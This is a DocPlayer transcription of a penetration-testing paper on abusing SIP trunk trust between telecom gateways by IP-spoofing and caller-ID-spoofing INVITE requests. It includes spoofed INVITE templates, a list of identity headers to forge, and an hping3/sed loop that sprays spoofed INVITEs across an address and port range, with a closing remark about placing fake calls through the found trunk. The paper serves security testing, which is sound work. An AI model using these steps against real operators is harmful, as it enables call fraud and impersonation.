Hacking Trust Relationships of SIP Gateways



Similar documents
Three-Way Calling using the Conferencing-URI

AGILE SIP TRUNK IP-PBX Connection Manual (Asterisk)

Hacking SIP Services Like a Boss. Fatih Özavcı Information Security Researcher & Consultant

TECHNICAL SUPPORT NOTE. 3-Way Call Conferencing with Broadsoft - TA900 Series

VoIP Wars : Return of the SIP

VoIP Wars : Return of the SIP

Part II. Prof. Ai-Chun Pang Graduate Institute of Networking and Multimedia, Dept. of Comp. Sci. and Info. Engr., National Taiwan University

SIP Essentials Training

For internal circulation of BSNL only

How To Understand The Purpose Of A Sip Aware Firewall/Alg (Sip) With An Alg (Sip) And An Algen (S Ip) (Alg) (Siph) (Network) (Ip) (Lib

SIP ALG - Session Initiated Protocol Applications- Level Gateway

Formación en Tecnologías Avanzadas

Grandstream Networks, Inc. GXP2130/2140/2160 Auto-configuration Plug and Play

SIP: Protocol Overview

SIP Basics. CSG VoIP Workshop. Dennis Baron January 5, Dennis Baron, January 5, 2005 Page 1. np119

Session Initiation Protocol (SIP) 陳 懷 恩 博 士 助 理 教 授 兼 計 算 機 中 心 資 訊 網 路 組 組 長 國 立 宜 蘭 大 學 資 工 系 TEL: # 340

Voice over IP (SIP) Milan Milinković

IP-Telephony SIP & MEGACO

Application Notes for IDT Net2Phone SIP Trunking Service with Avaya IP Office Issue 1.0

Analysis of a VoIP Attack

SIP: Session Initiation Protocol. Copyright by Elliot Eichen. All rights reserved.

Denial of Services on SIP VoIP infrastructures

AGILE SIP TRUNK IP- PBX Connection Manual (Asterisk, Trixbox)

VoIP Fraud Analysis. Simwood esms Limited Tel:

VoIP Wars: Attack of the Cisco Phones

Media Gateway Controller RTP

SIP Trunking & Peering Operation Guide

OpenSIPS For Asterisk Users

3GPP TS V8.1.0 ( )

Application Notes for Configuring SIP Trunking between McLeodUSA SIP Trunking Solution and an Avaya IP Office Telephony Solution 1.

Storming SIP Security Captions

Handbook: Residential VoIP and IP Centrex Services Maintenance Release 23

Viproy Reloaded 2.0. Compliance, Protection & Business Confidence. Melbourne Level 10, 401 Docklands Drv

ASTERISK. Goal. Prerequisites. Asterisk IP PBX Configuration

Technical Communication 1201 Norphonic emergency rugged telephone on Alcatel-Lucent OmniPCX Enterprise

IP Office Technical Tip

PORTA ONE. Porta Switch. Handbook: Residential VoIP Services Maintenance Release 24.

VoIP Wars: Attack of the Cisco Phones

SIP Security. ENUM-Tag am 28. September in Frankfurt. Prof. Dr. Andreas Steffen. Agenda.

An outline of the security threats that face SIP based VoIP and other real-time applications

ARCHITECTURES TO SUPPORT PSTN SIP VOIP INTERCONNECTION

Asterisk with Twilio Elastic SIP Trunking Interconnection Guide using Secure Trunking (SRTP/TLS)

SIP Trunk 2 IP-PBX User Guide Asterisk. Ver /08/01 Ver /09/17 Ver /10/07 Ver /10/15 Ver1.0.

Session Initiation Protocol

Multimedia Communication in the Internet. SIP: Advanced Topics. Dorgham Sisalem, Sven Ehlert Mobile Integrated Services FhG FOKUS

SIP Session Initiation Protocol

VoIP some threats, security attacks and security mechanisms. Lars Strand RiskNet Open Workshop Oslo, 24. June 2009

Multimedia & Protocols in the Internet - Introduction to SIP

Voice over IP & Other Multimedia Protocols. SIP: Session Initiation Protocol. IETF service vision. Advanced Networking

JJ Technical Specification on Called Party Subaddress Information Interface between Private SIP Networks. First Edition

3.1 SESSION INITIATION PROTOCOL (SIP) OVERVIEW

Session Initiation Protocol (SIP)

Session Initiation Protocol (SIP) The Emerging System in IP Telephony

IP Office 4.2 SIP Trunking Configuration Guide AT&T Flexible Reach and AT&T Flexible Reach with Business in a Box (SM)

Avaya IP Office 4.0 Customer Configuration Guide SIP Trunking Configuration For Use with Cbeyond s BeyondVoice with SIPconnect Service

NAT Traversal in SIP. Baruch Sterman, Ph.D. Chief Scientist David Schwartz Director, Telephony Research

Transparent weaknesses in VoIP

Request for Comments: August 2006

Firewall Support for SIP

VoIP. What s Voice over IP?

Enabling Security Features in Firmware DGW v2.0 June 22, 2011

The VoIP Vulnerability Scanner

VoIP LAB. 陳 懷 恩 博 士 助 理 教 授 兼 所 長 國 立 宜 蘭 大 學 資 訊 工 程 研 究 所 TEL: # 255

Interoperability between IPv4 and IPv6 SIP User Agents

NTP VoIP Platform: A SIP VoIP Platform and Its Services

EE4607 Session Initiation Protocol

Penetration Testing SIP Services

Sense of Security VoIP Security Testing Training

Session Initiation Protocol (SIP) Chapter 5

Protect Yourself Against VoIP Hacking. Mark D. Collier Chief Technology Officer SecureLogix Corporation

Sense of Security VoIP Security Testing Training

PORTA ONE. Porta Switch. Handbook: Residential VoIP Services Maintenance Release 23.

MOHAMED EL-SHAER Teaching Assistant. Room TASK Exercises Thu., Nov. 17, 2014 CONTENT

How to make free phone calls and influence people by the grugq

SIP and ENUM. Overview DENIC. Introduction to SIP. Addresses and Address Resolution in SIP ENUM & SIP

Microsoft s Proposal to the SIP Forum. For SIP Trunking Interoperability

Troubleshooting Calls in the TA900

SIP PBX TRUNKING WITH SIP-DDI 1.0

Basic Xten Pro Configuration

The use of IP networks, namely the LAN and WAN, to carry voice. Voice was originally carried over circuit switched networks

SIP for Voice, Video and Instant Messaging

internet technologies and standards

SIP Introduction. Jan Janak

VoIP Fundamentals. SIP In Depth

Telecommunication Services Engineering (TSE) Lab. Chapter V. SIP Technology For Value Added Services (VAS) in NGNs

PORTA ONE. PortaSwitch Handbook: SIP Services Maintenance Release 16. Part I.

BROADWORKS SIP ACCESS SIDE EXTENSIONS INTERFACE SPECIFICATIONS RELEASE Version 1

AUTOMATED PENETRATION TESTING

NTP VoIP Platform: A SIP VoIP Platform and Its Services 1

Session Initiation Protocol

Internet Voice, Video and Telepresence Harvard University, CSCI E-139. Lecture #5

Session Initiation Protocol and Services

Session Initiation Protocol (SIP)

User Manual. Four Channel s GSM VoIP Gateway. Model: GSM4SIP

SIP and Mobility: IP Multimedia Subsystem in 3G Release 5

Transcription:

Hacking Trust Relationships of SIP Gateways Author : Fatih Özavcı Homepage : gamasec.net/fozavci SIP Project Page : github.com/fozavci/gamasec-sipmodules Version : 0.9

Hacking Trust Relationship Between SIP Proxies NGN (Next Generation Networks) operators provide SIP services for their customers. Customers can call other operator's customers via SIP services and SIP gateways. SIP gateways use SIP Trunks for trusted call initiation and cdr/invoice management. SIP trunk defines as an IP address or specific FROM number in many cases. Challenge response or certificate based authentication is slow for quick response in this type of large call counts. Because of that, SIP trunks have no password or IP based filter applied for trunk authentication. These SIP trunks use specific FROM numbers or Proxy fields to initiate a call. Besides, most of SIP trunks have Direct INVITE privilege without REGISTER. Sample Network Diagram for Next Generation Networks GamaSEC Information Security Solutions Sayfa 2

In our example, Operator A SIP gateway (172.16.1.13) accepts calls from Operator B SIP (192.168.1.10) gateway. Also a privileged port number (5089) should be defined as a SIP Trunk. Operator A SIP gateway has a SIP Trunk for 192.168.1.10 IP address and 5089 UDP port. In this example, SIP Gateway accepts calls from 192.168.1.10 IP address and 5089 udp port without authentication. SIP Trunk Configuration of Operator A Gateway ACCEPT ALL from 192.168.1.10:5089 WITHOUT_AUTH As a penetration tester, we have no information about this configuration. Our only information is the IP address of Operator A SIP gateway, 172.16.1.13. We cannot detect trusted Operator Networks without any extra information. We can search newspapers or Internet for any trusted Telecom Company connections. It could be enumerated if we have a trusted 3rd party Operator IP Network information. So, here is our start point, we have the IP address of Operator A SIP gateway (172.16.1.13) and 3rd party trusted Operator's IP Network, 192.168.1.0/24. How could we detect SIP Trunk IP address and port of Operator B? The answer is INVITE spoofing with IP spoofing. First of all, we can send IP spoofed UDP packets (from 192.168.1.0/24) but we cannot get any answer for that. INVITE spoofing is required at this point, we can get a call INVITE spoofing with IP spoofing if Operator A SIP Gateway cannot detect INVITE spoofing. We can send SIP Calls from Operator B Network using IP spoofing. These calls should be defined for calling a well-known Client or Customer from Operator A. We can create this template INVITE request using valid INVITE request sample from Operator A. Then we should change IP address and Port of Attacker, also FROM field of INVITE. The reason of changing FROM field of INVITE request is getting valid IP address and Port of SIP Trunk using CLIP/CLIR screen of Customer's Phone. GamaSEC Information Security Solutions Sayfa 3

Our Basic Test Steps 1 Get an Account or Customer's Phone 2 Obtain a Valid INVITE Request 3 Test the Target SIP Gateway for INVITE Spoofing with a Known Account 4 Send IP Spoofed INVITE Requests 4.1 Create INVITE Spoofing Template 4.2 IP Addresses For Loop 4.3 Port Numbers For Loop 4.4 Changing INVITE Variables for Spoofed IP Address and Port 4.5 Setting FROM Field as IP:Port Obtaining Valid INVITE Request We should initiate a call with a valid account and we should capture INVITE request from a valid call handshake using Wireshark. Also we can initiate a call using Metasploit SIP Pen-Testing Kit for this part of test (see training videos). Sample INVITE Request INVITE sip:100@172.16.1.13 SIP/2.0 Via: SIP/2.0/UDP 111.222.33.44:5060; branch=2342sdf34324asdfasdf To: <sip:100@172.16.1.13;user=phone> From: <sip:101@172.16.1.13>;tag=50bf38ef322423571042 Call-ID: 32234wdf23432f@111.222.33.44:5060 CSeq: 1 INVITE Contact: <sip:101@111.222.33.44:5060;transport=udp> Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, INFO, REFER, NOTIFY Max-Forwards: 20 Supported: 100rel User-Agent: Softswitch 1.0.0 Content-Type: multipart/mixed;boundary= xxxx-xxxx-xxx Content-Length: 234 Content-Type: application/sdp v=0 o=xxxxx 2 4640 IN IP4 172.16.1.13 s=phone-call c=in IP4 111.222.33.44 t=0 0 m=audio 10338 RTP/AVP 8 0 18 4 GamaSEC Information Security Solutions Sayfa 4

a=ptime:20 Content-Type: application/isup; base=nxv3; version=itu-t92+ Content-Disposition: signal; handling=optional... INVITE Spoofing Test We should change FROM Field of INVITE to Fake Number and initiate the call. We could detect INVITE Spoofing is permitted if we see our Fake Number on Client's CLIP/CLIR screen. From: <sip:fakenumber@172.16.1.13>;tag=50bf38ef322423571042 Metasploit SIP Pen-Testing kit has a support for basic INVITE spoofing and It will support advanced INVITE spoofing techniques soon. (see the training videos of SIP Pen-Test Kit) Additional Information for INVITE Spoofing INVITE spoofing is a very complex attack because of many fields are responsible for caller identity. FROM field is the first field and it could be changed for INVITE spoofing. Another forgotten feature of FROM is name feature, we could define name like <name>100@server. This should work for this attack, because we need just a field to put IP address and Port information. There are many headers for INVITE spoofing, these headers and content fields are listed below. Via Field P-Asserted-Identity P-Called-Party-ID P-Preferred-Identity ISDN Calling Party Number Remote-Party-ID GamaSEC Information Security Solutions Sayfa 5

Preparing Spoofed INVITE Request Template Here is the tricky part of this paper: We should prepare unique INVITE request for each IP address and Port combination. Important fields of INVITE request are highlighted. All fields prepared for template of our test sources, IPADDRESS label and PORT label used for that. Spoofed INVITE Request INVITE sip:100@172.16.1.13 SIP/2.0 Via: SIP/2.0/UDP IPADDRESS:PORT; branch=2342sdf34324asdfasdf To: <sip:100@172.16.1.13;user=phone> From: <sip:ipaddress:port@172.16.1.13>;tag=50bf38ef322423571042 Call-ID: 32234wdf23432f@IPADDRESS:PORT CSeq: 1 INVITE Contact: <sip:101@ipaddress:port;transport=udp> Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, INFO, REFER, NOTIFY Max-Forwards: 20 Supported: 100rel User-Agent: Softswitch 1.0.0 Content-Type: multipart/mixed;boundary= xxxx-xxxx-xxx Content-Length: 234 Content-Type: application/sdp v=0 o=xxxxx 2 4640 IN IP4 172.16.1.13 s=phone-call c=in IP4 IPADDRESS t=0 0 m=audio 10338 RTP/AVP 8 0 18 4 a=ptime:20 Content-Type: application/isup; base=nxv3; version=itu-t92+ Content-Disposition: signal; handling=optional... We need a few headers if target SIP Trunks need SIP Proxy headers. You should check these headers in regular INVITE requests of Operator A SIP Gateway. Also we should change these headers if the server needs these headers. P-Asserted-Identity field is another FROM field and target SIP gateway could use P-Asserted-Identity field rather than FROM field. We should set them correctly for each request. GamaSEC Information Security Solutions Sayfa 6

P-Asserted-Identity: <sip:ipaddress:port@172.16.1.13> P-Charging-Vector: icid-value=testplatform;msan-id=msanid;msan-pro=msanport Record-Route: <sip:ipaddress:port;lr> Sending Spoofed INVITE Request Template from Operator B Network Now we can send our spoofed INVITE requests for Operator B Network. It should be performed with a loop for each IP address and Port combination. We can use hping for IP spoofing and sed for search&replace actions. This is a sample loop for IP spoofing for port in {5060..5090} do for host in {1..254} do cat invite_template sed -e s/ipaddress/192.168.1.$host/ -e s/port/$port/ > stmplt hping3-2 -d 1148 -E stpmlt -a 192.168.1.$host -s $port -p 5060 172.16.1.13 done done We should start this script and wait a call. We should have the SIP Trunk IP address and Port number if we have call with a spoofed Caller ID. If we have not a call, we should check our INVITE template for missing headers. At last, we have a SIP Trunk IP address and port number. We can use this SIP Trunk to call every privileged target number and initiate fake calls. When we need to initiate a fake call, we should send it with IP spoofed packet like a SIP trunk. I will add Custom Header support to my SIP Pen-Testing Kit, it's required for many test cases including this attack. Also I will develop a module to test this type of trust relationship with many options. GamaSEC Information Security Solutions Sayfa 7

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information